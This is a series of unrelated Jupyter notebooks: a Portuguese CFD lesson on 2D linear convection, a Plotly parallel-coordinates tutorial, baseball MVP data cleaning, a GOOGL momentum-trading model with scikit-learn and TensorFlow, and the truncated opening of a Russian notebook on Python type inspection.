> Texto fornecido sob a Creative Commons Attribution license, CC-BY. Todo o código está disponível sob a FSF-approved BSD-3 license.<br>
> (c) Original por Lorena A. Barba, Gilbert F. Forsyth em 2017, traduzido por Felipe N. Schuch em 2020.<br>
> [@LorenaABarba](https://twitter.com/LorenaABarba) - [@fschuch](https://twitter.com/fschuch)
12 passos para Navier-Stokes
======
***
Até agora, todo nosso trabalho tem sido em uma dimensão espacial (Passos [1](./01_Passo_1.ipynb) ao [4](./05_Passo_4.ipynb)). Podemos aprender muito apenas em 1D, mas vamos partir para as _planícies_: duas dimensões.
Nos exercícios à seguir, vamos estender os primeiros quatro passos para 2D. Para expandir as fórmulas 1D de diferenças finitas para diferenciais parciais em 2D ou 3D, apenas aplique a definição: a derivada parcial com respeito a $x$ é a variação na direção $x$ com $y$ *constante*.
No espaço 2D, uma malha retangular (uniforme) é definida por pontos com coordenadas:
$$x_i = x_0 +i \Delta x$$
$$y_j = y_0 +j \Delta y$$
Agora, definimos $u_{i,j} = u(x_i,y_j)$ e aplicamos os esquemas de diferenças finitas em cada variável $x,y$ *agindo separadamente* nos índices $i$ e $j$. Todas as derivadas são beseadas na expansão de Taylor 2D no ponto da malha ao redor de $u_{i,j}$.
Assim, para a derivada espacial de primeira ordem na direção $x$, a fórmula de diferenças finitas é:
$$ \frac{\partial u}{\partial x}\biggr\rvert_{i,j} = \frac{u_{i+1,j}-u_{i,j}}{\Delta x}+\mathcal{O}(\Delta x)$$
e de maneira similar na direção $y$. Dessa maneira, podemos escrever os esquemas de diferenças para frente, diferenças para trás ou diferenças centradas dos Passos 5 ao 12. Vamos começar!
Passo 5: Convecção Linear 2D
----
***
A EDP que governa a convecção linear 2D é escrita como
$$\frac{\partial u(x,y)}{\partial t}+c\frac{\partial u(x,y)}{\partial x} + c\frac{\partial u(x,y)}{\partial y} = 0$$
Essa é exatamente a mesma forma vista na equação linear 1D, exceto que agora tem duas dimensões espaciais para se levar em conta quando avançamos no tempo.
Novamente, o passo de tempo será discretizado com diferença para frente, enquando ambas coordenadas espaciais serão discretizadas com esquemas de diferença para trás.
Na implementação 1D, usamos o subscrito $i$ para representar o movimento no espaço (por exemplo, $u_{i}^n-u_{i-1}^n$). Agora que temos que considerar duas dimensões, vamos precisar adicionar um segundo subscrito, $j$, para considerar toda a informação do problema.
Aqui, vamos usar $i$ novamente como índice para nossos valores em $x$, e vamos adicionar o índice $j$ para marcar valores em $y$.
Com isso em mente, a discretização da nossa EDP pode ser bastante direta
$$\frac{u_{i,j}^{n+1}-u_{i,j}^n}{\Delta t} + c\frac{u_{i, j}^n-u_{i-1,j}^n}{\Delta x} + c\frac{u_{i,j}^n-u_{i,j-1}^n}{\Delta y}=0.$$
Como antes, isolamos a incógnita
$$u_{i,j}^{n+1} = u_{i,j}^n-c \frac{\Delta t}{\Delta x}(u_{i,j}^n-u_{i-1,j}^n)-c \frac{\Delta t}{\Delta y}(u_{i,j}^n-u_{i,j-1}^n)$$
Vamos resolver a equação com a seguinte condição inicial (CI):
$$u(x,y) = \begin{cases}
\begin{matrix}
2 & \text{ se } 0,5 \leq x, y \leq 1 \cr
1 & \text{senão}\end{matrix}\end{cases}$$
e as condições de contorno:
$$u = 1\ \text{para } \begin{cases}
\begin{matrix}
x = 0,\ 2 \cr
y = 0,\ 2 \end{matrix}\end{cases}$$
```
## Nova biblioteca necessária para gráficos em projeções 3D
from mpl_toolkits.mplot3d import Axes3D
import numpy
from matplotlib import pyplot, cm
%matplotlib inline
###Declaração das variáveis
nx = 81
ny = 81
nt = 100
c = 1
dx = 2 / (nx - 1)
dy = 2 / (ny - 1)
sigma = .2
dt = sigma * dx
x = numpy.linspace(0, 2, nx)
y = numpy.linspace(0, 2, ny)
u = numpy.ones((nx, ny)) ##Cria um vetor ny x nx com 1
un = numpy.ones((nx, ny)) ##
###Assinala a condição Inicial
##CI função chapéu : u(0,5<=x<=1 && 0,5<=y<=1 ) is 2
u[int(.5 / dx):int(1 / dx + 1),int(.5 / dy):int(1 / dy + 1)] = 2
###Gráfica da Condição Inicial
##the figsize parameter can be used to produce different sized images
fig = pyplot.figure(figsize=(11, 7), dpi=100)
ax = fig.gca(projection='3d')
X, Y = numpy.meshgrid(x, y)
surf = ax.plot_surface(X, Y, u[:].T, cmap=cm.viridis)
```
### Notas sobre o Gráfico 3D
Para produzir a projeção 3D dos resultados, tenha certeza de que tenha adicionardo a biblioteca Axes3D.
```python
from mpl_toolkits.mplot3d import Axes3D
```
O comando gráfico atual envolve alguns comandos a mais que uma simples curva 2D.
```python
fig = pyplot.figure(figsize=(11, 7), dpi=100)
ax = fig.gca(projection='3d')
surf2 = ax.plot_surface(X, Y, u[:].T)
```
A primeira linha aqui é a inicialização da janela da figura. Os comandos **figsize** e **dpi** são opcionais, e simplesmente especificam o tamanho e resolução da figura sendo criada. Eles podem ser omitidos, mas você anda vai precisar do
```python
fig = pyplot.figure()
```
As linhas seguintes assinalam a janela gráfica para a etiqueta 'ax' e também especificam que ela será uma projeção 3D. A última linha usa o comando
```python
plot_surface()
```
que é equivalente ao comando plot padrão, mas ele recebe os valores da malha X e Y para os valores da posição dos pontos.
##### Nota
Os valores `X` e `Y` que são passados como argumento para `plot_surface` não são os mesmos vetores 1D `x` e `y`. Para usar as funções gráficas Matplotlib 3D, você precisa gerar uma malha de `x, y` valores que correspondem a cada coordenada na estrutura do gráfico. Essas coordenadas são produzidas usando a função numpy `meshgrid`.
```python
X, Y = numpy.meshgrid(x, y)
```
Observe que, por definição, a biblioteca funciona com os índices opostos a nossa definição $i, j$. Então informamos como argumento a transposta da nossa função, isto é, `u[:].T`.
### Iterando em duas dimensões
A avaliação da onda em duas dimensões demanda o uso de diversos laços `for` aninhados para cobrir todos $i, j, n$. Uma vez que Python é uma linguagem interpretada (não compilada), pode-se notar considerável lentidão na execução de multiplos laços `for`. Primeiro, vamos verificar o código da convecção 2D e ver os resultaados produzidos.
```
u = numpy.ones((nx, ny))
u[int(.5 / dx):int(1 / dx + 1), int(.5 / dy):int(1 / dy + 1)] = 2
for n in range(nt + 1): ##loop across number of time steps
un = u.copy()
row, col = u.shape
for i in range(1, row):
for j in range(1, col):
u[i, j] = (un[i, j] - (c * dt / dx * (un[i, j] - un[i-1, j])) -
(c * dt / dy * (un[i, j] - un[i, j-1])))
u[0, :] = 1
u[-1, :] = 1
u[:, 0] = 1
u[:, -1] = 1
fig = pyplot.figure(figsize=(11, 7), dpi=100)
ax = fig.gca(projection='3d')
surf2 = ax.plot_surface(X, Y, u[:].T, cmap=cm.viridis)
```
Operações de Arranjos
----------------
Aqui o mesmo código de convecção 2D é implementado, mas em vez de usar laços `for` aninhados, o mesmo cálculo é avaliado usando operações de arranjos.
```
u = numpy.ones((nx, ny))
u[int(.5 / dx):int(1 / dx + 1), int(.5 / dy):int(1 / dy + 1)] = 2
for n in range(nt + 1): ##Laço temporal
un = u.copy()
u[1:, 1:] = (un[1:, 1:] - (c * dt / dx * (un[1:, 1:] - un[:-1, 1:])) -
(c * dt / dy * (un[1:, 1:] - un[1:, :-1])))
u[0, :] = 1
u[-1, :] = 1
u[:, 0] = 1
u[:, -1] = 1
fig = pyplot.figure(figsize=(11, 7), dpi=100)
ax = fig.gca(projection='3d')
surf2 = ax.plot_surface(X, Y, u[:].T, cmap=cm.viridis)
```
Material Complementar
-----
***
A lição em vídeo que cobre os detalhes para o Passo 5 (e adiante até o Passo 8) é **_Video Lesson 6_** no YouTube:
```
from IPython.display import YouTubeVideo
YouTubeVideo('tUg_dE3NXoY')
from IPython.core.display import HTML
def css_styling():
styles = open("../styles/custom.css", "r").read()
return HTML(styles)
css_styling()
```
> A célula acima executa o estilo para esse notebook. Nós modificamos o estilo encontrado no GitHub de [CamDavidsonPilon](https://github.com/CamDavidsonPilon), [@Cmrn_DP](https://twitter.com/cmrn_dp).
| github_jupyter |
#### New to Plotly?
Plotly's Python library is free and open source! [Get started](https://plot.ly/python/getting-started/) by downloading the client and [reading the primer](https://plot.ly/python/getting-started/).
<br>You can set up Plotly to work in [online](https://plot.ly/python/getting-started/#initialization-for-online-plotting) or [offline](https://plot.ly/python/getting-started/#initialization-for-offline-plotting) mode, or in [jupyter notebooks](https://plot.ly/python/getting-started/#start-plotting-online).
<br>We also have a quick-reference [cheatsheet](https://images.plot.ly/plotly-documentation/images/python_cheat_sheet.pdf) (new!) to help you get started!
#### Version Check
Note: Parallel Coordinates Plots are available in version <b>2.0.6+</b><br>
Run `pip install plotly --upgrade` to update your Plotly version.
```
import plotly
plotly.__version__
```
### Basic Parallel Coordinates Plot
```
import plotly.plotly as py
import plotly.graph_objs as go
import pandas as pd
df = pd.read_csv("https://raw.githubusercontent.com/bcdunbar/datasets/master/iris.csv")
data = [
go.Parcoords(
line = dict(color = df['species_id'],
colorscale = [[0,'#D7C16B'],[0.5,'#23D8C3'],[1,'#F3F10F']]),
dimensions = list([
dict(range = [0,8],
constraintrange = [4,8],
label = 'Sepal Length', values = df['sepal_length']),
dict(range = [0,8],
label = 'Sepal Width', values = df['sepal_width']),
dict(range = [0,8],
label = 'Petal Length', values = df['petal_length']),
dict(range = [0,8],
label = 'Petal Width', values = df['petal_width'])
])
)
]
layout = go.Layout(
plot_bgcolor = '#E5E5E5',
paper_bgcolor = '#E5E5E5'
)
fig = go.Figure(data = data, layout = layout)
py.iplot(fig, filename = 'parcoords-basic')
```
Parallel coordinates are richly interactive by default. Drag the lines along the axes to filter regions and drag the axis names across the plot to rearrange variables:

### Advanced Parallel Coordinates Plot
```
import plotly.plotly as py
import plotly.graph_objs as go
import pandas as pd
df = pd.read_csv("https://raw.githubusercontent.com/bcdunbar/datasets/master/parcoords_data.csv")
data = [
go.Parcoords(
line = dict(color = df['colorVal'],
colorscale = 'Jet',
showscale = True,
reversescale = True,
cmin = -4000,
cmax = -100),
dimensions = list([
dict(range = [32000,227900],
constraintrange = [100000,150000],
label = 'Block Height', values = df['blockHeight']),
dict(range = [0,700000],
label = 'Block Width', values = df['blockWidth']),
dict(tickvals = [0,0.5,1,2,3],
ticktext = ['A','AB','B','Y','Z'],
label = 'Cyclinder Material', values = df['cycMaterial']),
dict(range = [-1,4],
tickvals = [0,1,2,3],
label = 'Block Material', values = df['blockMaterial']),
dict(range = [134,3154],
visible = True,
label = 'Total Weight', values = df['totalWeight']),
dict(range = [9,19984],
label = 'Assembly Penalty Weight', values = df['assemblyPW']),
dict(range = [49000,568000],
label = 'Height st Width', values = df['HstW']),
dict(range = [-28000,196430],
label = 'Min Height Width', values = df['minHW']),
dict(range = [98453,501789],
label = 'Min Width Diameter', values = df['minWD']),
dict(range = [1417,107154],
label = 'RF Block', values = df['rfBlock'])
])
)
]
py.iplot(data, filename = 'parcoords-advanced')
```
#### Reference
See https://plot.ly/python/reference/#parcoords for more information and chart attribute options!
```
from IPython.display import display, HTML
display(HTML('<link href="//fonts.googleapis.com/css?family=Open+Sans:600,400,300,200|Inconsolata|Ubuntu+Mono:400,700" rel="stylesheet" type="text/css" />'))
display(HTML('<link rel="stylesheet" type="text/css" href="http://help.plot.ly/documentation/all_static/css/ipython-notebook-custom.css">'))
#! pip install git+https://github.com/plotly/publisher.git --upgrade
import publisher
publisher.publish(
'parcoords.ipynb', 'pandas/parallel-coordinates-plot/', 'Parallel Coordinates Plot | plotly',
'How to make parallel coorindates plots with Pandas and Plotly.',
title = 'Parallel Coordinates Plot | plotly',
name = 'Parallel Coordinates Plot',
has_thumbnail='true', thumbnail='thumbnail/parcoords.jpg',
language='pandas',
page_type='example_index',
display_as='scientific', order=11)
```
| github_jupyter |
```
# Dependencies
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import math
import os
import sklearn
import sklearn.datasets
from sklearn.datasets import make_regression
from sklearn.ensemble import GradientBoostingClassifier
np.set_printoptions(threshold=np.inf)
# read in data
batting = pd.read_csv("Fangraphs Leaderboard.csv")
awards = pd.read_csv("AwardsPlayers.csv")
master = pd.read_csv("Master.csv", encoding='latin-1')
team = pd.read_csv("teamResults.csv")
teamNames = pd.read_csv("Teams.csv")
# calculate win percentage for each team
teamNames['Win_percent'] = teamNames['W'] / (teamNames['W'] + teamNames['L'])
teamNames.rename(columns = {'name': 'Team'}, inplace = True)
teamNames.tail()
# lots of data manipulation and cleaning was necessary to get all these datasets into the proper form for merging
teamNames = teamNames.replace("Houston Astros", "Astros", regex = True)
teamNames = teamNames.replace("Oakland Athletics", "Athletics", regex = True)
teamNames = teamNames.replace("Los Angeles Angels of Anaheim", "Angels", regex = True)
teamNames = teamNames.replace("Texas Rangers", "Rangers", regex = True)
teamNames = teamNames.replace("Seattle Mariners", "Mariners", regex = True)
teamNames = teamNames.replace("Colorado Rockies", "Rockies", regex = True)
teamNames = teamNames.replace("San Francisco Giants", "Giants", regex = True)
teamNames = teamNames.replace("San Diego Padres", "Padres", regex = True)
teamNames = teamNames.replace("Los Angeles Dodgers", "Dodgers", regex = True)
teamNames = teamNames.replace("Arizona Diamondbacks", "Diamondbacks", regex = True)
teamNames = teamNames.replace("Cleveland Indians", "Indians", regex = True)
teamNames = teamNames.replace("Kansas City Royals", "Royals", regex = True)
teamNames = teamNames.replace("Minnesota Twins", "Twins", regex = True)
teamNames = teamNames.replace("Detroit Tigers", "Tigers", regex = True)
teamNames = teamNames.replace("Chicago White Sox", "White Sox", regex = True)
teamNames = teamNames.replace("Chicago Cubs", "Cubs", regex = True)
teamNames = teamNames.replace("Milwaukee Brewers", "Brewers", regex = True)
teamNames = teamNames.replace("Cincinnati Reds", "Reds", regex = True)
teamNames = teamNames.replace("Pittsburgh Pirates", "Pirates", regex = True)
teamNames = teamNames.replace("St. Louis Cardinals", "Cardinals", regex = True)
teamNames = teamNames.replace("New York Yankees", "Yankees", regex = True)
teamNames = teamNames.replace("Boston Red Sox", "Red Sox", regex = True)
teamNames = teamNames.replace("Toronto Blue Jays", "Blue Jays", regex = True)
teamNames = teamNames.replace("Baltimore Orioles", "Orioles", regex = True)
teamNames = teamNames.replace("Tampa Bay Rays", "Rays", regex = True)
teamNames = teamNames.replace("New York Mets", "Mets", regex = True)
teamNames = teamNames.replace("Philadelphia Phillies", "Phillies", regex = True)
teamNames = teamNames.replace("Miami Marlins", "Marlins", regex = True)
teamNames = teamNames.replace("Atlanta Braves", "Braves", regex = True)
teamNames = teamNames.replace("Washington Nationals", "Nationals", regex = True)
teamNames = teamNames.replace("Montreal Expos", "Expos", regex = True)
teamNames
# more data cleaning using various pandas functions
master.drop(['birthYear', 'birthMonth', 'birthDay','birthCountry', 'birthState','birthCity','deathYear','deathMonth','deathDay','deathCountry','deathState','deathCity', 'debut','finalGame','retroID','bbrefID'], axis=1, inplace=True)
awardsMVP = awards.loc[awards['awardID'] == "Most Valuable Player"]
data1 = pd.merge(awardsMVP, master, on= ['playerID'], how = 'left')
data1 = data1.loc[data1['yearID'] > 1997 ]
data1['Name'] = data1['nameFirst'] + ' ' + data1['nameLast']
batting.rename(columns = {'Season': 'yearID'}, inplace = True)
data1.drop(['tie', 'notes'], axis=1, inplace=True)
data = pd.merge(batting, data1, on= ['Name', 'yearID'], how = 'left')
data.drop(['nameFirst', 'nameLast', 'nameGiven'], axis=1, inplace=True)
data = data.replace("AL", "0", regex = True)
data = data.replace("NL", "1", regex = True)
data.to_csv('dataNames.csv')
data
# more data cleaning
team = team.replace("HOU", "Astros", regex = True)
team = team.replace("OAK", "Athletics", regex = True)
team = team.replace("LAA", "Angels", regex = True)
team = team.replace("TEX", "Rangers", regex = True)
team = team.replace("SEA", "Mariners", regex = True)
team = team.replace("COL", "Rockies", regex = True)
team = team.replace("SFG", "Giants", regex = True)
team = team.replace("SDP", "Padres", regex = True)
team = team.replace("LAD", "Dodgers", regex = True)
team = team.replace("ARI", "Diamondbacks", regex = True)
team = team.replace("CLE", "Indians", regex = True)
team = team.replace("KCR", "Royals", regex = True)
team = team.replace("MIN", "Twins", regex = True)
team = team.replace("DET", "Tigers", regex = True)
team = team.replace("CWS", "White Sox", regex = True)
team = team.replace("CHC", "Cubs", regex = True)
team = team.replace("MIL", "Brewers", regex = True)
team = team.replace("CIN", "Reds", regex = True)
team = team.replace("PIT", "Pirates", regex = True)
team = team.replace("STL", "Cardinals", regex = True)
team = team.replace("NYY", "Yankees", regex = True)
team = team.replace("BOS", "Red Sox", regex = True)
team = team.replace("TOR", "Blue Jays", regex = True)
team = team.replace("BAL", "Orioles", regex = True)
team = team.replace("TBD", "Rays", regex = True)
team = team.replace("TBR", "Rays", regex = True)
team = team.replace("NYM", "Mets", regex = True)
team = team.replace("PHI", "Phillies", regex = True)
team = team.replace("MIA", "Marlins", regex = True)
team = team.replace("ATL", "Braves", regex = True)
team = team.replace("WSN", "Nationals", regex = True)
team = team.replace("MON", "Expos", regex = True)
team = team.drop(team.index[0])
team.rename(columns = {'league': 'lgID', 'team': 'Team'}, inplace = True)
team = team.replace("AL", "0", regex = True)
team = team.replace("NL", "1", regex = True)
team
# creating the dummy variable for MVP, this will be the dependent variable in the model
data['MVP'] = data['awardID']
dummies = data.loc[data['MVP'] == 'Most Valuable Player']
non_dummies = data.loc[data['MVP'] != 'Most Valuable Player']
dummies['MVP_dummy'] = 1
non_dummies['MVP_dummy'] = 0
data_dummies = dummies.append(non_dummies)
df = data_dummies.sort_values(by = ['yearID'])
df1 = data_dummies.sort_values(by = ['yearID'])
df1 = pd.DataFrame({"Name": df1['Name'], "playerid": df1['playerid'], "yearID": df1['yearID'], "Team": df1['Team']})
df1.head()
# merging of data to create dataframe that will be used to merge names with award winners (string columns can't be used
# in model)
df1 = pd.merge(df1, teamNames, on = ['Team', 'yearID'], how='inner')
df1 = pd.merge(df1, team, on = ['Team'], how='inner')
print(df1)
df1 = pd.DataFrame({'Name': df1['Name'], 'Team': df1['Team'], 'playerid': df1['playerid'], 'yearID': df1['yearID'], 'Win_percent': df1['Win_percent'], 'lgID': df1['lgID_y']})
df1
df.drop(['playerID','awardID', 'weight', 'height', 'bats', 'throws', 'MVP', 'BB%', 'K%', 'Name'], axis = 1, inplace = True )
# more merging
df_2018 = df.loc[df['yearID'] == 2018]
print(df_2018)
df = pd.merge(df, df1, on = ['playerid', 'yearID', 'Team'], how = 'inner')
df.drop(['Name', 'Team', 'lgID_x'], axis=1, inplace=True)
df.head()
# merging for test data
df_2018 = pd.merge(df_2018, team, on=['Team'], how='left')
df_2018.drop(['lgID_x', 'Team'], axis=1, inplace=True)
df_2018 = df_2018.fillna(0)
df_2018
# creating ranking system for each stat. This is necessary for the model to run and create predictions properly
df['G'] = df.groupby(['yearID', 'lgID_y'])['G'].rank(ascending=False)
df['PA'] = df.groupby(['yearID', 'lgID_y'])['PA'].rank(ascending=False)
df['HR'] = df.groupby(['yearID', 'lgID_y'])['HR'].rank(ascending=False)
df['R'] = df.groupby(['yearID', 'lgID_y'])['R'].rank(ascending=False)
df['RBI'] = df.groupby(['yearID', 'lgID_y'])['RBI'].rank(ascending=False)
df['SB'] = df.groupby(['yearID', 'lgID_y'])['SB'].rank(ascending=False)
df['ISO'] = df.groupby(['yearID', 'lgID_y'])['ISO'].rank(ascending=False)
df['BABIP'] = df.groupby(['yearID', 'lgID_y'])['BABIP'].rank(ascending=False)
df['AVG'] = df.groupby(['yearID', 'lgID_y'])['AVG'].rank(ascending=False)
df['OBP'] = df.groupby(['yearID', 'lgID_y'])['OBP'].rank(ascending=False)
df['SLG'] = df.groupby(['yearID', 'lgID_y'])['SLG'].rank(ascending=False)
df['wOBA'] = df.groupby(['yearID', 'lgID_y'])['wOBA'].rank(ascending=False)
df['wRC+'] = df.groupby(['yearID', 'lgID_y'])['wRC+'].rank(ascending=False)
df['BsR'] = df.groupby(['yearID', 'lgID_y'])['BsR'].rank(ascending=False)
df['Off'] = df.groupby(['yearID', 'lgID_y'])['Off'].rank(ascending=False)
df['Def'] = df.groupby(['yearID', 'lgID_y'])['Def'].rank(ascending=False)
df['WAR'] = df.groupby(['yearID', 'lgID_y'])['WAR'].rank(ascending=False)
print(df.tail())
# ranking 2018 testing data same way as above
df_2018['G'] = df_2018.groupby(['yearID', 'lgID_y'])['G'].rank(ascending=False)
df_2018['PA'] = df_2018.groupby(['yearID', 'lgID_y'])['PA'].rank(ascending=False)
df_2018['HR'] = df_2018.groupby(['yearID', 'lgID_y'])['HR'].rank(ascending=False)
df_2018['R'] = df_2018.groupby(['yearID', 'lgID_y'])['R'].rank(ascending=False)
df_2018['RBI'] = df_2018.groupby(['yearID', 'lgID_y'])['RBI'].rank(ascending=False)
df_2018['SB'] = df_2018.groupby(['yearID', 'lgID_y'])['SB'].rank(ascending=False)
df_2018['ISO'] = df_2018.groupby(['yearID', 'lgID_y'])['ISO'].rank(ascending=False)
df_2018['BABIP'] = df_2018.groupby(['yearID', 'lgID_y'])['BABIP'].rank(ascending=False)
df_2018['AVG'] = df_2018.groupby(['yearID', 'lgID_y'])['AVG'].rank(ascending=False)
df_2018['OBP'] = df_2018.groupby(['yearID', 'lgID_y'])['OBP'].rank(ascending=False)
df_2018['SLG'] = df_2018.groupby(['yearID', 'lgID_y'])['SLG'].rank(ascending=False)
df_2018['wOBA'] = df_2018.groupby(['yearID', 'lgID_y'])['wOBA'].rank(ascending=False)
df_2018['wRC+'] = df_2018.groupby(['yearID', 'lgID_y'])['wRC+'].rank(ascending=False)
df_2018['BsR'] = df_2018.groupby(['yearID', 'lgID_y'])['BsR'].rank(ascending=False)
df_2018['Off'] = df_2018.groupby(['yearID', 'lgID_y'])['Off'].rank(ascending=False)
df_2018['Def'] = df_2018.groupby(['yearID', 'lgID_y'])['Def'].rank(ascending=False)
df_2018['WAR'] = df_2018.groupby(['yearID', 'lgID_y'])['WAR'].rank(ascending=False)
df_2018
# saving data to use for the predictions notebook. Switch to Machine_Learning_Predictions for the findings
df.to_csv("training_data.csv")
df_2018.to_csv("testing_data.csv")
```
| github_jupyter |
# Momentum Trading
```
import time_series_transform as tst
import pandas as pd
import numpy as np
from matplotlib import pyplot as plt
from time_series_transform.transform_core_api.util import *
from time_series_transform.stock_transform.util import *
tickList = [
'GOOGL'
]
pe = tst.Portfolio_Extractor(tickList,'yahoo')
port = pe.get_portfolio_date('2010-06-24','2020-07-30')
port.remove_different_date()
def rolling_std(arr,windowSize):
df = pd.DataFrame(arr,columns = ['tmp'])
return df.tmp.rolling(windowSize).std().values
labels = []
colList = ['Open', 'High', 'Low', 'Close']
for c in colList:
port.make_technical_indicator(c,f'{c}_wavelet',wavelet_denoising,wavelet = 'haar')
port.make_technical_indicator(c,f'{c}_gma150',geometric_ma,windowSize = 150)
port.make_technical_indicator(c,f'{c}_gma10',geometric_ma,windowSize = 10)
port.make_technical_indicator(c,f'{c}_std10',rolling_std,windowSize = 10)
port.make_technical_indicator(c,f'{c}_std50',rolling_std,windowSize = 50)
for t in tickList:
labels.extend([
f'{t}_{c}',
f'{t}_{c}_wavelet',
f'{t}_{c}_gma50',
f'{t}_{c}_gma10',
f'{t}_{c}_william',
f'{t}_{c}_std10',
f'{t}_{c}_std50',
f'{t}_{c}_so',
])
# port.make_technical_indicator('Close',f'william',williams_r)
port.make_technical_indicator('Close',f'macd',macd,return_diff=True)
port.make_technical_indicator('Close',f'so',stochastic_oscillator)
df = port.get_portfolio_dataFrame()
ptspd = tst.Pandas_Time_Series_Panel_Dataset(df)
ptspd =ptspd.expand_dataFrame_by_category('Date','symbol')
ptspd = ptspd.make_slide_window('Date',30).make_lead_column('Date','Close_GOOGL',1)
df = ptspd.df
df = df.drop(['Dividends_GOOGL','Stock Splits_GOOGL'],axis =1)
df=df.sort_values('Date')
df['trmin'] = df[["Close_GOOGL_lead1","Close_GOOGL"]].min(axis =1)
df['trmax'] = df[["Close_GOOGL_lead1","Close_GOOGL"]].max(axis =1)
df['tr'] = (df["Close_GOOGL"] - df["trmin"])/(df['trmax'] - df['trmin'])
df["momentum"] = df["Close_GOOGL_lead1"] - df["Close_GOOGL"]
df["momentum"] = df["momentum"].apply(lambda x: 1 if x > 0 else 0)
df = df.dropna()
df['tr'] = df.tr.apply(lambda x: 1 if x > 0.5 else 0)
df.tr.value_counts()
train = df[df.Date <= '2020-06-30'].sort_values('Date')
test = df[df.Date > '2020-06-30'].sort_values('Date')
trainX = train.drop(['Date','Close_GOOGL_lead1','momentum','tr','trmin','trmax'],axis = 1)
trainY = train["tr"]
testX = test.drop(['Date','Close_GOOGL_lead1','momentum','tr','trmin','trmax'],axis = 1)
testY = test["tr"]
```
# Machine Learning
```
from sklearn.ensemble import RandomForestRegressor,RandomForestClassifier
from sklearn.tree import DecisionTreeRegressor,DecisionTreeClassifier
from sklearn.svm import SVR,SVC
from sklearn.decomposition import PCA
from sklearn.preprocessing import StandardScaler,MinMaxScaler,Normalizer
from sklearn.pipeline import Pipeline
from sklearn.metrics import mean_squared_error,confusion_matrix
from sklearn.model_selection import TimeSeriesSplit,RandomizedSearchCV
from scipy.stats import uniform
pip = Pipeline([
('std',StandardScaler()),
('pca',PCA(10,whiten = False)),
('svm',SVC(C = 0.5,kernel = 'poly',degree = 3))
])
hparam = {
'pca__n_components':np.arange(2,50,dtype='int'),
'svm__C':uniform(loc=2, scale=6),
'svm__degree':np.arange(4,10,dtype='int'),
}
ranCV = RandomizedSearchCV(pip,hparam,
30,
scoring = 'f1',
cv = TimeSeriesSplit(2),
n_jobs = -1,
verbose = 50)
ranCV.fit(trainX,trainY)
print(confusion_matrix(testY,ranCV.predict(testX)))
prd = pd.DataFrame(ranCV.predict(testX),columns = ['prd'])
def make_momentum(predList):
resList = []
for i in predList:
if i > 0.5:
resList.append(0)
else:
resList.append(1)
# meanList.append(i)
return resList
# prd['momentum']=make_momentum(testY.tolist())
prd['momentum']=make_momentum(prd.prd.tolist())
prd.prd.plot()
prd['actual_momentum'] = df[df.Date > '2020-06-30'].momentum.values
prd['Date'] = df[df.Date > '2020-06-30'].Date.values
prd['Close'] = testX['Close_GOOGL'].values
prd = prd.sort_values('Date')
def make_signale(momentumList):
signal = []
lastStatus = None
for i in momentumList:
if i == 1:
tmp = 'buy'
else:
tmp = 'sell'
if len(signal) == 0:
if tmp == 'sell':
signal.append('hold')
else:
signal.append(tmp)
else:
if tmp == lastStatus:
signal.append('hold')
else:
signal.append(tmp)
lastStatus = tmp
return signal
prd['signal'] = make_signale(prd.momentum.tolist())
plt.figure(figsize=(15,10))
plt.plot(prd.Close.values)
for ix,v in enumerate(prd[['Close','signal']].values):
if v[1] == 'buy':
buy = plt.plot(ix,v[0],'x',label = 'buy')
elif v[1] == 'sell':
plt.plot(ix,v[0],'o',label='sell')
plt.legend(('Close','buy','sell'))
plt.show()
def profit_eval(prdDf):
tmp = prdDf[prd.signal != 'hold'].sort_values('Date')[['signal','Close']]
tmp = tmp.to_records()
buy,sell = 0,0
for ix,v in enumerate(tmp):
if ix+1 == len(tmp) and tmp[ix][1] == 'buy':
continue
if tmp[ix][1] == 'buy':
buy += tmp[ix][2]
elif tmp[ix][1] == 'sell':
sell += tmp[ix][2]
return (sell-buy)/buy
profit_eval(prd)
```
# Neural Network
```
import tensorflow as tf
from sklearn.feature_selection import SelectKBest,chi2,f_regression
std = StandardScaler()
tX = std.fit_transform(trainX)
dataset = tf.data.Dataset.from_tensor_slices((tX, trainY.values))
dataset = dataset.shuffle(100)
def get_compiled_model():
model = tf.keras.Sequential([
# tf.keras.layers.Dense(500, activation='relu'),
# tf.keras.layers.LayerNormalization(),
tf.keras.layers.Dense(10, activation='sigmoid'),
tf.keras.layers.Dense(1,'sigmoid')
])
model.compile(optimizer=tf.keras.optimizers.Nadam(0.1,decay= 0.001),
loss=tf.keras.losses.BinaryCrossentropy(),
metrics=['accuracy'])
return model
model = get_compiled_model()
model.fit(x=tX,y=trainY.values, epochs=50,validation_split= 0.01)
ttX = std.transform(testX)
prd = pd.DataFrame(model.predict(ttX),columns = ['prd'])
prd['momentum']=make_momentum(testY.tolist(),prd.prd.tolist())
prd['Date'] = df[df.Date > '2020-06-30'].Date.values
prd['Close'] = testX['Close_GOOGL'].values
prd = prd.sort_values('Date')
prd['signal'] = make_signale(prd.momentum.tolist())
plt.figure(figsize=(15,10))
plt.plot(prd.Close.values)
for ix,v in enumerate(prd[['Close','signal']].values):
if v[1] == 'buy':
buy = plt.plot(ix,v[0],'x',label = 'buy')
elif v[1] == 'sell':
plt.plot(ix,v[0],'o',label='sell')
plt.legend(('Close','buy','sell'))
plt.show()
profit_eval(prd)
prd.prd.plot()
```
| github_jupyter |
# Простые способы работы с типами
Несколько встроенных функций:
```
print(callable(lambda: 1))
print(isinstance("abc", str))
print(issubclass(ValueError, Exception))
```
И всякие магические атрибуты (https://docs.python.org/3/library/inspect.html):
<table class="docutils align-default">
<colgroup>
<col style="width: 19%">
<col style="width: 33%">
<col style="width: 47%">
</colgroup>
<thead>
<tr class="row-odd"><th class="head"><p>Type</p></th>
<th class="head"><p>Attribute</p></th>
<th class="head"><p>Description</p></th>
</tr>
</thead>
<tbody>
<tr class="row-even"><td><p>module</p></td>
<td><p>\__doc__</p></td>
<td><p>documentation string</p></td>
</tr>
<tr class="row-odd"><td></td>
<td><p>\__file__</p></td>
<td><p>filename (missing for
built-in modules)</p></td>
</tr>
<tr class="row-even"><td><p>class</p></td>
<td><p>\__doc__</p></td>
<td><p>documentation string</p></td>
</tr>
<tr class="row-odd"><td></td>
<td><p>\__name__</p></td>
<td><p>name with which this
class was defined</p></td>
</tr>
<tr class="row-even"><td></td>
<td><p>\__qualname__</p></td>
<td><p>qualified name</p></td>
</tr>
<tr class="row-odd"><td></td>
<td><p>\__module__</p></td>
<td><p>name of module in which
this class was defined</p></td>
</tr>
<tr class="row-even"><td><p>method</p></td>
<td><p>\__doc__</p></td>
<td><p>documentation string</p></td>
</tr>
<tr class="row-odd"><td></td>
